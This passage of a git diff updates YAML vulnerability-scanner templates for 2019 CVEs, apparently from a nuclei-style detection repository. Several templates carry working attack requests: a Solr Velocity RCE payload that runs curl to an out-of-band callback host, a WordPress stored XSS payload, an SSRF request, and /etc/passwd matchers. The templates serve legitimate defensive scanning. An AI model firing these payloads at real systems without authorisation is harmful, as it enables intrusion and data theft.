+  tags: edb,cve,cve2019,rce,packetstorm
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml
index 92493e242a..13f6df33f6 100644
--- a/cves/2019/CVE-2019-16313.yaml
+++ b/cves/2019/CVE-2019-16313.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
     - https://nvd.nist.gov/vuln/detail/CVE-2019-16313
+    - http://www.iwantacve.cn/index.php/archives/311/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml
index fc7ada7814..1cf033a1f8 100644
--- a/cves/2019/CVE-2019-16332.yaml
+++ b/cves/2019/CVE-2019-16332.yaml
@@ -1,13 +1,14 @@
 id: CVE-2019-16332
 
 info:
-  name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress API Bearer Auth <20190907 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
+  description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
   reference:
     - https://plugins.trac.wordpress.org/changeset/2152730
     - https://wordpress.org/plugins/api-bearer-auth/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16332
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml
index a935ad3779..a7866e5ed2 100644
--- a/cves/2019/CVE-2019-16525.yaml
+++ b/cves/2019/CVE-2019-16525.yaml
@@ -1,18 +1,21 @@
 id: CVE-2019-16525
 
 info:
-  name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Checklist <1.1.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
+  description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
   reference:
+    - https://wordpress.org/plugins/checklist/#developers
+    - https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
+    - https://plugins.trac.wordpress.org/changeset/2155029/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-16525
     cwe-id: CWE-79
-  tags: cve,cve2019,wordpress,xss,wp-plugin
+  tags: xss,wp-plugin,packetstorm,cve,cve2019,wordpress
 
 requests:
   - method: GET
@@ -34,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-1653.yaml b/cves/2019/CVE-2019-1653.yaml
index 92f6be1306..2b7d4683bb 100644
--- a/cves/2019/CVE-2019-1653.yaml
+++ b/cves/2019/CVE-2019-1653.yaml
@@ -1,33 +1,39 @@
 id: CVE-2019-1653
 
 info:
-  name: Unauthenticated Cisco Small Business WAN VPN Routers Sensitive Info Disclosure
+  name: Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure
   author: dwisiswant0
   severity: high
-  description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.
-    The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit
-    could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.
+  description: |
+    Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
   reference:
     - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
     - https://www.exploit-db.com/exploits/46262/
     - https://www.exploit-db.com/exploits/46655/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-1653
+  remediation: |
+    Cisco has released firmware updates that address this vulnerability.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-1653
     cwe-id: CWE-200
-  tags: cve,cve2019,cisco
+  tags: kev,edb,cve,cve2019,cisco,router,exposure
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/cgi-bin/config.exp"
+
     matchers-condition: and
     matchers:
+
+      - type: word
+        part: body
+        words:
+          - "sysconfig"
+
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - "sysconfig"
-        part: body
+# Enhanced by mp on 2022/06/14
diff --git a/cves/2019/CVE-2019-16662.yaml b/cves/2019/CVE-2019-16662.yaml
index 737f80169e..7dd8c3a46a 100644
--- a/cves/2019/CVE-2019-16662.yaml
+++ b/cves/2019/CVE-2019-16662.yaml
@@ -4,11 +4,11 @@ info:
   name: rConfig 3.9.2 Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter
-    is passed to the exec function without filtering, which can lead to command execution.
+  description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
   reference:
     - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-16662
+    - https://drive.google.com/open?id=1OXI5cNuwWqc6y-7BgNCfYHgFPK2cpvnu
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml
index bf741b806c..936703b5c7 100644
--- a/cves/2019/CVE-2019-16759.yaml
+++ b/cves/2019/CVE-2019-16759.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/
     - https://nvd.nist.gov/vuln/detail/CVE-2019-16759
+    - https://seclists.org/fulldisclosure/2019/Sep/31
+    - https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-16759
     cwe-id: CWE-94
-  tags: cve,cve2019,vbulletin,rce
+  tags: rce,kev,seclists,cve,cve2019,vbulletin
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-16920.yaml b/cves/2019/CVE-2019-16920.yaml
index 7679d6ccd6..3f120d40c0 100644
--- a/cves/2019/CVE-2019-16920.yaml
+++ b/cves/2019/CVE-2019-16920.yaml
@@ -1,20 +1,22 @@
 id: CVE-2019-16920
 
 info:
-  name: Unauthenticated Multiple D-Link Routers RCE
+  name: D-Link Routers - Remote Code Execution
   author: dwisiswant0
   severity: critical
-  description: Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device
-    common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are
-    also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
+  description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
   reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16920
     - https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
+    - https://fortiguard.com/zeroday/FG-VD-19-117
+    - https://www.seebug.org/vuldb/ssvid-98079
+    - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-16920
     cwe-id: CWE-78
-  tags: cve,cve2019,dlink,rce
+  tags: cve,cve2019,dlink,rce,router,unauth,kev
 
 requests:
   - raw:
@@ -45,12 +47,14 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
           - "\\[(font|extension|file)s\\]"
         condition: or
 
-        part: body
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2019/CVE-2019-16931.yaml b/cves/2019/CVE-2019-16931.yaml
new file mode 100644
index 0000000000..870a85d2d8
--- /dev/null
+++ b/cves/2019/CVE-2019-16931.yaml
@@ -0,0 +1,48 @@
+id: CVE-2019-16931
+
+info:
+  name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
+  reference:
+    - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
+    - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
+    - https://wpvulndb.com/vulnerabilities/9893
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-16931
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan
+
+requests:
+  - raw:
+      - |
+        POST /wp-json/visualizer/v1/update-chart HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"id": 7, "visualizer-chart-type": "<script>alert(document.domain)</script>"}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{"success":"Chart updated"}'
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-16932.yaml b/cves/2019/CVE-2019-16932.yaml
new file mode 100644
index 0000000000..97f300658a
--- /dev/null
+++ b/cves/2019/CVE-2019-16932.yaml
@@ -0,0 +1,48 @@
+id: CVE-2019-16932
+
+info:
+  name: Visualizer <3.3.1 - Blind Server-Side Request Forgery
+  author: akincibor
+  severity: critical
+  description: |
+    Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.
+  reference:
+    - https://wpscan.com/vulnerability/9892
+    - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-16932
+    - https://wordpress.org/plugins/visualizer/#developers
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
+    cvss-score: 10
+    cve-id: CVE-2019-16932
+    cwe-id: CWE-918
+  tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/wp-json/visualizer/v1/upload-data'
+
+    body: '{\"url\":\"http://{{interactsh-url}}\"}'
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "http"
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/05/27
diff --git a/cves/2019/CVE-2019-16996.yaml b/cves/2019/CVE-2019-16996.yaml
index 65395d8702..167ea7dcdf 100644
--- a/cves/2019/CVE-2019-16996.yaml
+++ b/cves/2019/CVE-2019-16996.yaml
@@ -1,18 +1,19 @@
 id: CVE-2019-16996
 
 info:
-  name: Metinfo7.0 beta - SQL Injection
+  name: Metinfo 7.0.0 beta - SQL Injection
   author: ritikchaddha
   severity: high
-  description: In Metinfo 7.0.0beta, a SQL Injection was discovered in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.
+  description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product&c=product_admin&a=dopara&app_type=shop id parameter.
   reference:
+    - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/1
     - https://nvd.nist.gov/vuln/detail/CVE-2019-16996
-  tags: metinfo,sqli,cve,cve2019
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.20
+    cvss-score: 7.2
     cve-id: CVE-2019-16996
     cwe-id: CWE-89
+  tags: metinfo,sqli,cve,cve2019
 
 requests:
   - method: GET
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/14
diff --git a/cves/2019/CVE-2019-16997.yaml b/cves/2019/CVE-2019-16997.yaml
index 8eb731a29f..5c976589e1 100644
--- a/cves/2019/CVE-2019-16997.yaml
+++ b/cves/2019/CVE-2019-16997.yaml
@@ -1,11 +1,12 @@
 id: CVE-2019-16997
 
 info:
-  name: Metinfo 7.0.0 beta SQLI
+  name: Metinfo 7.0.0 beta - SQL Injection
   author: ritikchaddha
   severity: high
-  description: In Metinfo 7.0.0beta, a SQL Injection was discovered in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter.
+  description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter.
   reference:
+    - https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/2
     - https://nvd.nist.gov/vuln/detail/CVE-2019-16997
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
@@ -35,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/14
diff --git a/cves/2019/CVE-2019-17270.yaml b/cves/2019/CVE-2019-17270.yaml
index 173cdf8052..610ea6c3e1 100644
--- a/cves/2019/CVE-2019-17270.yaml
+++ b/cves/2019/CVE-2019-17270.yaml
@@ -1,20 +1,21 @@
 id: CVE-2019-17270
 
 info:
-  name: Yachtcontrol Webapplication 1.0 - Unauthenticated Rce
+  name: Yachtcontrol Webapplication 1.0 - Remote Command Injection
   author: pikpikcu
   severity: critical
   description: |
-    A vulnerability in Yachtcontrol makes it possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
+    Yachtcontrol Webapplication 1.0 makes it possible to perform direct operating system commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
   reference:
     - https://www.exploit-db.com/exploits/47760
     - https://nvd.nist.gov/vuln/detail/CVE-2019-17270
+    - http://packetstormsecurity.com/files/155582/Yachtcontrol-2019-10-06-Remote-Code-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-17270
     cwe-id: CWE-78
-  tags: rce,yachtcontrol,cve,cve2019
+  tags: rce,yachtcontrol,cve,cve2019,edb,packetstorm
 
 requests:
   - method: GET
@@ -23,8 +24,8 @@ requests:
 
     matchers-condition: and
     matchers:
-
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
         condition: and
@@ -32,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml
index 8b758e6ab3..fcd443d7f7 100644
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@@ -1,26 +1,25 @@
 id: CVE-2019-17382
 
 info:
-  name: Zabbix Authentication Bypass
+  name: Zabbix <=4.4 - Authentication Bypass
   author: harshbothra_
   severity: critical
-  description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report,
-    Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
+  description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
   reference:
     - https://www.exploit-db.com/exploits/47467
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
     cve-id: CVE-2019-17382
     cwe-id: CWE-639
-  tags: cve,cve2019,zabbix,fuzz,bypass,login
+  tags: fuzz,auth-bypass,login,edb,cve,cve2019,zabbix
 
 requests:
   - raw:
       - |
         GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
         Host: {{Hostname}}
-        Accept-Language: en-US,en;q=0.9
 
     payloads:
       ids: helpers/wordlists/numbers.txt
@@ -29,11 +28,13 @@ requests:
     stop-at-first-match: true
     matchers-condition: and
     matchers:
+      - type: word
+        words:
+          - "<title>Dashboard</title>"
 
       - type: status
         status:
           - 200
 
-      - type: word
-        words:
-          - "<title>Dashboard</title>"
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2019/CVE-2019-17418.yaml b/cves/2019/CVE-2019-17418.yaml
index b3c68ed1ea..0cfca0ca30 100644
--- a/cves/2019/CVE-2019-17418.yaml
+++ b/cves/2019/CVE-2019-17418.yaml
@@ -1,18 +1,20 @@
 id: CVE-2019-17418
 
 info:
-  name: MetInfo 7.0 - SQL Injection
+  name: MetInfo 7.0.0 beta - SQL Injection
   author: ritikchaddha
   severity: high
-  description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997
+  description: |
+    MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997).
   reference:
+    - https://github.com/evi1code/Just-for-fun/issues/2
     - https://nvd.nist.gov/vuln/detail/CVE-2019-17418
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
     cve-id: CVE-2019-17418
     cwe-id: CWE-89
-  tags: metinfo,sqli,cve,cve2019
+  tags: cve,cve2019,metinfo,sqli
 
 requests:
   - method: GET
@@ -31,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-17444.yaml b/cves/2019/CVE-2019-17444.yaml
index 2cdda95c41..d7bb5dd6b7 100644
--- a/cves/2019/CVE-2019-17444.yaml
+++ b/cves/2019/CVE-2019-17444.yaml
@@ -1,11 +1,11 @@
 id: CVE-2019-17444
 
 info:
-  name: Jfrog Artifactory default password
+  name: Jfrog Artifactory <6.17.0 - Default Admin Password
   author: pdteam
   severity: critical
   description: |
-    Jfrog Artifactory uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0.
+    Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.
   reference:
     - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes
     - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory
@@ -30,13 +30,14 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
           - '"name":"admin"'
           - '"admin":true'
-        condition: and
\ No newline at end of file
+        condition: and
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2019/CVE-2019-17503.yaml b/cves/2019/CVE-2019-17503.yaml
index 9a0c73e92b..a29a0b8b0f 100644
--- a/cves/2019/CVE-2019-17503.yaml
+++ b/cves/2019/CVE-2019-17503.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/47498
     - https://nvd.nist.gov/vuln/detail/CVE-2019-17503
+    - https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS%205.5.3.5%20Multiple%20Vulnerabilities
+    - http://packetstormsecurity.com/files/154838/Kirona-DRS-5.5.3.5-Information-Disclosure.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2019-17503
     cwe-id: CWE-425
-  tags: cve,cve2019,exposure
+  tags: cve,cve2019,exposure,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml
index 4fadfcfacf..0266aa2ecc 100644
--- a/cves/2019/CVE-2019-17506.yaml
+++ b/cves/2019/CVE-2019-17506.yaml
@@ -1,18 +1,20 @@
 id: CVE-2019-17506
 
 info:
-  name: D-Link DIR-868L & DIR-817LW - Information Disclosure
+  name: D-Link DIR-868L/817LW - Information Disclosure
   author: pikpikcu
   severity: critical
-  description: There are some web interfaces without authentication requirements on D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.
+  description: |
+    D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.
   reference:
     - https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17506
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-17506
     cwe-id: CWE-306
-  tags: cve,cve2019,dlink,router
+  tags: cve,cve2019,dlink,router,disclosure
 
 requests:
   - method: POST
@@ -26,12 +28,14 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
       - type: word
+        part: body
         words:
           - "</password>"
           - "DEVICE.ACCOUNT"
-        part: body
         condition: and
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml
index 808a4d8f51..ebc2f42584 100644
--- a/cves/2019/CVE-2019-17538.yaml
+++ b/cves/2019/CVE-2019-17538.yaml
@@ -1,12 +1,14 @@
 id: CVE-2019-17538
 
 info:
-  name: Jnoj arbitrary local file inclusion (LFI)
+  name: Jiangnan Online Judge 0.8.0 - Local File Inclusion
   author: pussycat0x
   severity: high
-  description: Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via web/polygon/problem/viewfile?id=1&name=../
+  description: |
+    Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1&name=../.
   reference:
     - https://github.com/shi-yang/jnoj/issues/53
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-17538
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -23,10 +25,13 @@ requests:
 
     matchers-condition: and
     matchers:
+
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
       - type: status
         status:
           - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml
index 2bbe315a1c..97a4563023 100644
--- a/cves/2019/CVE-2019-17558.yaml
+++ b/cves/2019/CVE-2019-17558.yaml
@@ -4,16 +4,17 @@ info:
   name: Apache Solr <=8.3.1 - Remote Code Execution
   author: pikpikcu,madrobot
   severity: high
-  description: "Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user)."
+  description: Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).
   reference:
     - https://issues.apache.org/jira/browse/SOLR-13971
     - https://nvd.nist.gov/vuln/detail/CVE-2019-17558
+    - https://lists.apache.org/thread.html/rb964fe5c4e3fc05f75e8f74bf6b885f456b7a7750c36e9a8045c627a@%3Cissues.lucene.apache.org%3E
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.5
     cve-id: CVE-2019-17558
     cwe-id: CWE-74
-  tags: cve,cve2019,apache,rce,solr,oast
+  tags: cve,cve2019,apache,rce,solr,oast,kev
 
 requests:
   - raw:
@@ -38,7 +39,7 @@ requests:
         }
 
       - |
-        GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
+        GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
         Host: {{Hostname}}
         Connection: close
 
diff --git a/cves/2019/CVE-2019-18371.yaml b/cves/2019/CVE-2019-18371.yaml
new file mode 100644
index 0000000000..49dfb3776c
--- /dev/null
+++ b/cves/2019/CVE-2019-18371.yaml
@@ -0,0 +1,35 @@
+id: CVE-2019-18371
+
+info:
+  name: Xiaomi Mi WiFi R3G Routers - Local file Inclusion
+  author: ritikchaddha
+  severity: high
+  description: |
